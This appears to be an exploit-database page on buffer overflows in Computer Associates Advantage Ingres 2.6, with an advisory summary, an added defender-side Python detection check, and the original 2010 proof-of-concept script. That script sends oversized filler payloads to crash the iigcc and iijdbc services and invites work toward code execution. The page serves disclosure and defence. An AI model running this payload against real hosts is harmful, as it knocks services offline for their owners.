Vendor: Advantage Ingres
By: @fdiskyou
CVSS: 7,5 (HIGH)
Type: Buffer Overflow
CWE: 119
Product Name: Advantage Ingres
Affected Version From: 2.6
Affected Version To: 2.6
Patch Exists: YES
Related CVE: CVE-2007-3336 - CVE-2007-3338
CPE: a:computer_associates:ingres:2.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 2003 Server SP1
Year: 2010

Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC

Computer Associates Advantage Ingres 2.6 contains multiple buffer overflows, each triggered by sending a large amount of data to a network service. In the iigcc service, a pointer is overwritten at byte 2106 and the process crashes while executing MOV EAX,DWORD PTR DS:[EDX+8]. In the iijdbc service, a pointer is overwritten at byte 1066 and the process crashes while executing CMP ECX,DWORD PTR DS:[EDI+4]. In both cases the crash occurs when the service dereferences the overwritten pointer (held in EDX and EDI respectively, per the PoC notes).

Mitigation:

Upgrade to the latest version of Computer Associates Advantage Ingres 2.6.
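
A defender-side check for the request shape described above, as an added example that is not part of the original advisory or PoC: it reassembles a client's TCP segments and flags a request that covers the pointer offset and is almost entirely one repeated byte. Only the 2106/1066 offsets come from this page; the segment tuples, the `inspect` helper, the 0.9 fill threshold and the sample flows are assumptions constructed for illustration.

```python
# Added example. Offsets are the ones stated on this page; everything else is assumed.
POINTER_OFFSET = {"iigcc": 2106, "iijdbc": 1066}
POINTER_SIZE = 4  # the PoC appends 4 bytes after the filler


def reassemble(segments):
    """Rebuild the client byte stream from (relative_seq, payload) TCP segments.

    Tolerates out-of-order delivery and retransmissions; stops at the first gap.
    """
    stream = bytearray()
    for seq, payload in sorted(segments):
        if seq > len(stream):
            break
        stream += payload[len(stream) - seq:]  # skip bytes already seen
    return bytes(stream)


def longest_run(data):
    """Length of the longest run of a single repeated byte value."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def inspect(service, segments, min_fill_ratio=0.9):
    """Flag a request that covers the pointer and is mostly one repeated byte."""
    offset = POINTER_OFFSET[service]
    data = reassemble(segments)
    reaches = len(data) >= offset + POINTER_SIZE
    fill = longest_run(data[:offset]) / offset if reaches else 0.0
    return {"bytes": len(data), "reaches_pointer": reaches,
            "fill_ratio": round(fill, 2), "alert": reaches and fill >= min_fill_ratio}


# Constructed sample flows (not captured traffic), split at a 1460-byte MSS.
FILLER = b"\x41" * 2106 + b"\x42" * 4
OVERSIZED = [(1460, FILLER[1460:]), (0, FILLER[:1460]), (0, FILLER[:1460])]
VARIED = [(0, bytes(range(256)) * 12)]  # long, but not filler
SHORT = [(0, b"constructed short request")]

if __name__ == "__main__":
    for name, flow in (("oversized", OVERSIZED), ("varied", VARIED), ("short", SHORT)):
        print(name, inspect("iigcc", flow))
```

A per-packet length rule would miss the iigcc case, because the 2110-byte request spans two segments at a typical MSS; the check has to run on the reassembled stream.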

Exploit-DB raw data:

# Exploit Title: Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC
# Date: 2010-08-14
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3336 - CVE-2007-3338
# Notes: Fixed in the last version.
# iigcc - EDX holds a pointer that's overwritten at byte 2106 and it crashes while executing
# MOV EAX,DWORD PTR DS:[EDX+8]
# iijdbc - EDI holds a pointer that's overwritten at byte 1066 and it crashes while executing 
# CMP ECX,DWORD PTR DS:[EDI+4]
# please let me know if you are/were able to get code execution

import socket
import sys

if len(sys.argv) != 4:
    print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
    print "Vulnerable Services: iigcc, iijdbc"
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]

if service == "iigcc":
    payload = "\x41" * 2106
elif service == "iijdbc":
    payload = "\x41" * 1066
else:
    print "Vulnerable Services: iigcc, iijdbc"
    sys.exit(1)

payload += "\x42" * 4

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)

print service + " crashed"